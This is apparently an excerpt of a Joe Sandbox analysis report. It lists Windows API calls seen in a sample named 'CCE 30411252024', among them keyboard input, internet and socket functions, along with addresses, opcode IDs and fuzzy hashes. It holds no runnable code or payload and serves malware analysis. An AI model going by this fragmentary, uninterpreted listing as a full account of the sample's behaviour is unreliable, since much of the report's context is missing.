                                                                                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                        • API String ID: 2574300362-3689287502
                                                                                        • Opcode ID: ff715e0a44e1e828f73644123687fc34900dbee4bf94dd8f92e9c53beb1445df
                                                                                        • Instruction ID: 38386ece3bb387d359b1c9899a6ab4ea9f235f4ddcbdd2a3f45284075cd0afc0
                                                                                        • Opcode Fuzzy Hash: ff715e0a44e1e828f73644123687fc34900dbee4bf94dd8f92e9c53beb1445df
                                                                                        • Instruction Fuzzy Hash: E2D0A770900716AFEB205F33E80C60276D4AB1171DB004519E491E2190D7F0D880D610
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,00F2052F,?,00F206D7), ref: 00F20572
                                                                                        • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00F20584
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                                        • API String ID: 2574300362-1587604923
                                                                                        • Opcode ID: 6202680ae63690c3d4ed4ee985b2257160351d20b65199326368117c5f31c175
                                                                                        • Instruction ID: b2b61a2b97c2948e460aa7416f5e69170c60242d340a904fc89300434ea1fd9a
                                                                                        • Opcode Fuzzy Hash: 6202680ae63690c3d4ed4ee985b2257160351d20b65199326368117c5f31c175
                                                                                        • Instruction Fuzzy Hash: 0AD0A731E00322AFEB205F31F809F0277E8AF05318B14851DE855D2151DBF0C4C0AA20
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(oleaut32.dll,?,00F2051D,?,00F205FE), ref: 00F20547
                                                                                        • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00F20559
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                                        • API String ID: 2574300362-1071820185
                                                                                        • Opcode ID: defdd7171620ef12de5a3c2e82810afd12a3b4cecb95466e6d7b6537f125828a
                                                                                        • Instruction ID: aea534ce889542584ec0a00599229d2eedbec50db2ab40123102dbef49b1c125
                                                                                        • Opcode Fuzzy Hash: defdd7171620ef12de5a3c2e82810afd12a3b4cecb95466e6d7b6537f125828a
                                                                                        • Instruction Fuzzy Hash: B3D0A731E00722AFEB208F21F80960176E4AB01319B14C41DF456D2151DAF0C880AA50
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00F3ECBE,?,00F3EBBB), ref: 00F3ECD6
                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00F3ECE8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                        • API String ID: 2574300362-1816364905
                                                                                        • Opcode ID: 33867c44b0caf37c74769ff9d3b5a51a6deef3103ecb2e735b752021d6c1437e
                                                                                        • Instruction ID: d7dcbc7de6763b80d6285d4320f687ae909cf2965f1e6f90a4f0b404665cdeac
                                                                                        • Opcode Fuzzy Hash: 33867c44b0caf37c74769ff9d3b5a51a6deef3103ecb2e735b752021d6c1437e
                                                                                        • Instruction Fuzzy Hash: 20D0A730D00723AFEF205F65E84864676E4AF01764F008419FC55D2191DBF0D881F710
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00F3BAD3,00000001,00F3B6EE,?,00F7DC00), ref: 00F3BAEB
                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00F3BAFD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: GetModuleHandleExW$kernel32.dll
                                                                                        • API String ID: 2574300362-199464113
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,00F43BD1,?,00F43E06), ref: 00F43BE9
                                                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00F43BFB
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                        • API String ID: 2574300362-4033151799
                                                                                        APIs
                                                                                        • CoInitialize.OLE32(00000000), ref: 00F3AAB4
                                                                                        • CoUninitialize.OLE32 ref: 00F3AABF
                                                                                          • Part of subcall function 00F20213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00F2027B
                                                                                        • VariantInit.OLEAUT32(?), ref: 00F3AACA
                                                                                        • VariantClear.OLEAUT32(?), ref: 00F3AD9D
                                                                                        Similarity
                                                                                        • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                        • API String ID: 780911581-0
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: Variant$AllocClearCopyInitString
                                                                                        • API String ID: 2808897238-0
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                                        • API String ID: 3877424927-0
                                                                                        APIs
                                                                                        • GetWindowRect.USER32(01036D70,?), ref: 00F4C544
                                                                                        • ScreenToClient.USER32(?,00000002), ref: 00F4C574
                                                                                        • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 00F4C5DA
                                                                                        Similarity
                                                                                        • API ID: Window$ClientMoveRectScreen
                                                                                        • API String ID: 3880355969-0
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00F1C462
                                                                                        • __itow.LIBCMT ref: 00F1C49C
                                                                                          • Part of subcall function 00F1C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00F1C753
                                                                                        • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00F1C505
                                                                                        • __itow.LIBCMT ref: 00F1C55A
                                                                                        Similarity
                                                                                        • API ID: MessageSend$__itow
                                                                                        • API String ID: 3379773720-0
                                                                                        APIs
                                                                                        • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00F23966
                                                                                        • SetKeyboardState.USER32(00000080,?,00000001), ref: 00F23982
                                                                                        • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00F239EF
                                                                                        • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00F23A4D
                                                                                        Similarity
                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                        • API String ID: 432972143-0
                                                                                        APIs
                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00F4B5D1
                                                                                        Similarity
                                                                                        • API ID: InvalidateRect
                                                                                        • API String ID: 634782764-0
                                                                                        APIs
                                                                                        • ClientToScreen.USER32(?,?), ref: 00F4D807
                                                                                        • GetWindowRect.USER32(?,?), ref: 00F4D87D
                                                                                        • PtInRect.USER32(?,?,00F4ED5A), ref: 00F4D88D
                                                                                        • MessageBeep.USER32(00000000), ref: 00F4D8FE
                                                                                        Similarity
                                                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                                                        • API String ID: 1352109105-0
                                                                                        APIs
                                                                                        • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00F23AB8
                                                                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 00F23AD4
                                                                                        • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00F23B34
                                                                                        • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00F23B92
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                        • String ID:
                                                                                        • API String ID: 432972143-0
                                                                                        • Opcode ID: 4ce010b9087b99943b770376257b0439ab4e0b0d170fe85e2f5aff14cf66e6b8
                                                                                        • Instruction ID: b8e1c1deb3237540efbd0b2c4fc549e6c3a89ca2c1e691120c447fe92331d31a
                                                                                        • Opcode Fuzzy Hash: 4ce010b9087b99943b770376257b0439ab4e0b0d170fe85e2f5aff14cf66e6b8
                                                                                        • Instruction Fuzzy Hash: 6B3126B1E00278AEEF208F64AC197FD7BA59B95321F04011AE481931D1C77C8F85FB61
                                                                                        APIs
                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00F14038
                                                                                        • __isleadbyte_l.LIBCMT ref: 00F14066
                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00F14094
                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00F140CA
                                                                                        Similarity
                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                        • String ID:
                                                                                        • API String ID: 3058430110-0
                                                                                        • Opcode ID: c2f1e598f35a445177e8d91f25bb6d33b6895983376a7451460ef109ecf7cf12
                                                                                        • Instruction ID: 1d848447d3bd1d199ef3185dfaa089f351c9ca732456fc2ecfff0faeca74e538
                                                                                        • Opcode Fuzzy Hash: c2f1e598f35a445177e8d91f25bb6d33b6895983376a7451460ef109ecf7cf12
                                                                                        • Instruction Fuzzy Hash: D431B431A00206AFDB219F76CC44BEA7BA5FF85320F154428E6659B191D731E8D1FB90
                                                                                        APIs
                                                                                        • GetForegroundWindow.USER32 ref: 00F47CB9
                                                                                          • Part of subcall function 00F25F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F25F6F
                                                                                          • Part of subcall function 00F25F55: GetCurrentThreadId.KERNEL32 ref: 00F25F76
                                                                                          • Part of subcall function 00F25F55: AttachThreadInput.USER32(00000000,?,00F2781F), ref: 00F25F7D
                                                                                        • GetCaretPos.USER32(?), ref: 00F47CCA
                                                                                        • ClientToScreen.USER32(00000000,?), ref: 00F47D03
                                                                                        • GetForegroundWindow.USER32 ref: 00F47D09
                                                                                        Similarity
                                                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                        • String ID:
                                                                                        • API String ID: 2759813231-0
                                                                                        • Opcode ID: 7ca7786ecc48c35fede1b4128bfa1b07d8046e5fe2d2ace7ff784535d2b98036
                                                                                        • Instruction ID: 8b73f735699c091860c9df70e4d6122d7d63e9309ea85b4c4d482f43bafcb81a
                                                                                        • Opcode Fuzzy Hash: 7ca7786ecc48c35fede1b4128bfa1b07d8046e5fe2d2ace7ff784535d2b98036
                                                                                        • Instruction Fuzzy Hash: 96312D72D00108AFCB00EFA5DC819EFFBF9EF94310B11846AE915E3211DB349E019BA0
                                                                                        APIs
                                                                                          • Part of subcall function 00EFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00EFB35F
                                                                                        • GetCursorPos.USER32(?), ref: 00F4F211
                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00F5E4C0,?,?,?,?,?), ref: 00F4F226
                                                                                        • GetCursorPos.USER32(?), ref: 00F4F270
                                                                                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00F5E4C0,?,?,?), ref: 00F4F2A6
                                                                                        Similarity
                                                                                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2864067406-0
                                                                                        • Opcode ID: dd87b657861fc13ef45cc414c82cdb9c71098fe4c8ddc6a3437453200ab74764
                                                                                        • Instruction ID: 6da389bb3564ebb931f18db68efdccbf5861f3323226009730c4039cb8907031
                                                                                        • Opcode Fuzzy Hash: dd87b657861fc13ef45cc414c82cdb9c71098fe4c8ddc6a3437453200ab74764
                                                                                        • Instruction Fuzzy Hash: 54218239A00018AFCB158F94C858EFA7FB5FF4A720F084065F909972A1D3749E51EB50
                                                                                        APIs
                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F34358
                                                                                          • Part of subcall function 00F343E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F34401
                                                                                          • Part of subcall function 00F343E2: InternetCloseHandle.WININET(00000000), ref: 00F3449E
                                                                                        Similarity
                                                                                        • API ID: Internet$CloseConnectHandleOpen
                                                                                        • String ID:
                                                                                        • API String ID: 1463438336-0
                                                                                        • Opcode ID: 20fedeccb28e75e50ec8bc58e83ea2953687c3d0bd93f614084f6adba5617baf
                                                                                        • Instruction ID: 06809163c3879038a41b0c32cb423e0461cb072716cdf98e3991fb4fc5afd29f
                                                                                        • Opcode Fuzzy Hash: 20fedeccb28e75e50ec8bc58e83ea2953687c3d0bd93f614084f6adba5617baf
                                                                                        • Instruction Fuzzy Hash: 4621A472604605BBDB159F609C00F7BBBA9FF44720F10401AFA1597650D771B821B7A1
                                                                                        APIs
                                                                                        • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00F38AE0
                                                                                        • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00F38AF2
                                                                                        • accept.WSOCK32(00000000,00000000,00000000), ref: 00F38AFF
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00F38B16
                                                                                        Similarity
                                                                                        • API ID: ErrorLastacceptselect
                                                                                        • String ID:
                                                                                        • API String ID: 385091864-0
                                                                                        • Opcode ID: faa6eeaae3992b80ffff5716d64043fbb861077279e4663798905d57fee2dea9
                                                                                        • Instruction ID: 908e193c395f856dea5d9dc6db021517dc576ff7271428065bd7a1b9707f2dd0
                                                                                        • Opcode Fuzzy Hash: faa6eeaae3992b80ffff5716d64043fbb861077279e4663798905d57fee2dea9
                                                                                        • Instruction Fuzzy Hash: 9221A872A001289FC7119F69DC85A9EBBFCEF89360F004169F949E7290DB74D9419F90
                                                                                        APIs
                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00F48AA6
                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00F48AC0
                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00F48ACE
                                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00F48ADC
                                                                                        Similarity
                                                                                        • API ID: Window$Long$AttributesLayered
                                                                                        • String ID:
                                                                                        • API String ID: 2169480361-0
                                                                                        • Opcode ID: 9c047d13a213c9e4006f90131c09f2a06b4fec6561e13b8a3c19b650c43b3558
                                                                                        • Instruction ID: 6c83608ff4ed580969a79ec9104c61d4cc3674c238d7e9376b6ec398142198b6
                                                                                        • Opcode Fuzzy Hash: 9c047d13a213c9e4006f90131c09f2a06b4fec6561e13b8a3c19b650c43b3558
                                                                                        • Instruction Fuzzy Hash: D511BE31745518AFEB04AB28DC05FBE7BD9AF89360F144119FA26D72E1CFB4AC019790
                                                                                        APIs
                                                                                          • Part of subcall function 00F21E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00F20ABB,?,?,?,00F2187A,00000000,000000EF,00000119,?,?), ref: 00F21E77
                                                                                          • Part of subcall function 00F21E68: lstrcpyW.KERNEL32(00000000,?,?,00F20ABB,?,?,?,00F2187A,00000000,000000EF,00000119,?,?,00000000), ref: 00F21E9D
                                                                                          • Part of subcall function 00F21E68: lstrcmpiW.KERNEL32(00000000,?,00F20ABB,?,?,?,00F2187A,00000000,000000EF,00000119,?,?), ref: 00F21ECE
                                                                                        • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00F2187A,00000000,000000EF,00000119,?,?,00000000), ref: 00F20AD4
                                                                                        • lstrcpyW.KERNEL32(00000000,?,?,00F2187A,00000000,000000EF,00000119,?,?,00000000), ref: 00F20AFA
                                                                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,00F2187A,00000000,000000EF,00000119,?,?,00000000), ref: 00F20B2E
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: lstrcmpilstrcpylstrlen
                                                                                        • String ID: cdecl
                                                                                        • API String ID: 4031866154-3896280584
                                                                                        • Opcode ID: 905d266d21adb428f55ce9f68e6b11a4aa44aff84d6dea164c8899c9434d6b5d
                                                                                        • Instruction ID: 564f3496cb05019c6fc18866964d369d9a765af8b701c3769501467a3814a42c
                                                                                        • Opcode Fuzzy Hash: 905d266d21adb428f55ce9f68e6b11a4aa44aff84d6dea164c8899c9434d6b5d
                                                                                        • Instruction Fuzzy Hash: 37119337600315AFDB25AF24EC45E7A77A8FF89364B80406AE906CB251EF719850E7A1
                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 00F12FB5
                                                                                          • Part of subcall function 00F0395C: __FF_MSGBANNER.LIBCMT ref: 00F03973
                                                                                          • Part of subcall function 00F0395C: __NMSG_WRITE.LIBCMT ref: 00F0397A
                                                                                          • Part of subcall function 00F0395C: RtlAllocateHeap.NTDLL(01010000,00000000,00000001,00000001,00000000,?,?,00EFF507,?,0000000E), ref: 00F0399F
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap_free
                                                                                        • String ID:
                                                                                        • API String ID: 614378929-0
                                                                                        • Opcode ID: f796e4da2bacd7a81845179d000508c04da861daec2ccc60dc86a55f7c9a9a8d
                                                                                        • Instruction ID: 572d33e50dd8deccde4aa902689263878402c204c1e54a83cfc6a5695795ba48
                                                                                        • Opcode Fuzzy Hash: f796e4da2bacd7a81845179d000508c04da861daec2ccc60dc86a55f7c9a9a8d
                                                                                        • Instruction Fuzzy Hash: 82110D32D083159BDB313FB4AC0569A3BD8AF04374F208915F84996291DB35D991B690
                                                                                        APIs
                                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00F205AC
                                                                                        • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00F205C7
                                                                                        • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00F205DD
                                                                                        • FreeLibrary.KERNEL32(?), ref: 00F20632
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                                        • String ID:
                                                                                        • API String ID: 3137044355-0
                                                                                        • Opcode ID: 00e179d5483719779457f023ecd3f72597f40592335016fead7b8bdb259a73f2
                                                                                        • Instruction ID: 70291d6104e0cad2b88b0a6f0163840f7841e3105cc26e4ca90e743b7f559d69
                                                                                        • Opcode Fuzzy Hash: 00e179d5483719779457f023ecd3f72597f40592335016fead7b8bdb259a73f2
                                                                                        • Instruction Fuzzy Hash: 10218173A00229EFDB20CF91EC88ADABBB8EF40704F008469E51696151DFB5EA55FF50
                                                                                        APIs
                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00F26733
                                                                                        • _memset.LIBCMT ref: 00F26754
                                                                                        • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00F267A6
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F267AF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                        • String ID:
                                                                                        • API String ID: 1157408455-0
                                                                                        • Opcode ID: d32350db7058681499ecbeb95fcb500e9571823c636198239d929718d938b9e9
                                                                                        • Instruction ID: a4bf30c6478af4f67aa73b27cbce54a93df2cabb49842c12bf00683d29554c62
                                                                                        • Opcode Fuzzy Hash: d32350db7058681499ecbeb95fcb500e9571823c636198239d929718d938b9e9
                                                                                        • Instruction Fuzzy Hash: 31110A72D012287AE72057A5BC4DFABBBBCEF44764F10419AF504E71C0D6744E809B74
                                                                                        APIs
                                                                                          • Part of subcall function 00F1AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00F1AA79
                                                                                          • Part of subcall function 00F1AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00F1AA83
                                                                                          • Part of subcall function 00F1AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00F1AA92
                                                                                          • Part of subcall function 00F1AA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00F1AA99
                                                                                          • Part of subcall function 00F1AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00F1AAAF
                                                                                        • GetLengthSid.ADVAPI32(?,00000000,00F1ADE4,?,?), ref: 00F1B21B
                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00F1B227
                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00F1B22E
                                                                                        • CopySid.ADVAPI32(?,00000000,?), ref: 00F1B247
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                                                        • String ID:
                                                                                        • API String ID: 4217664535-0
                                                                                        • Opcode ID: f4ae5e15a2f638b1ccf91091f5f1bd9ae7ece2762ff721686d18f46ed19dd7ab
                                                                                        • Instruction ID: 4f1424165c50df2d66439e56fd82b80e803432017647dee8cbb020d3ea26d78d
                                                                                        • Opcode Fuzzy Hash: f4ae5e15a2f638b1ccf91091f5f1bd9ae7ece2762ff721686d18f46ed19dd7ab
                                                                                        • Instruction Fuzzy Hash: A3118C71A00209FFDB059F98DD85AEEB7A9EF85314F14802DE94297210D775AE88EB10
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00F1B498
                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F1B4AA
                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F1B4C0
                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F1B4DB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 3850602802-0
                                                                                        • Opcode ID: fd5bcebd3ee19b3af1404c57fa6df0cb1bd5b317f868ea07c006502c94712d4d
                                                                                        • Instruction ID: ea55f2002fd6f3d61f893b0c71bdde04162056dbbeb90d2cf5d6bb3b0a8b1393
                                                                                        • Opcode Fuzzy Hash: fd5bcebd3ee19b3af1404c57fa6df0cb1bd5b317f868ea07c006502c94712d4d
                                                                                        • Instruction Fuzzy Hash: 0211487A900218FFDB11DFA9C885EDDBBB4FB08710F208091E604B7290D771AE50EB94
                                                                                        APIs
                                                                                          • Part of subcall function 00EFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00EFB35F
                                                                                        • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00EFB5A5
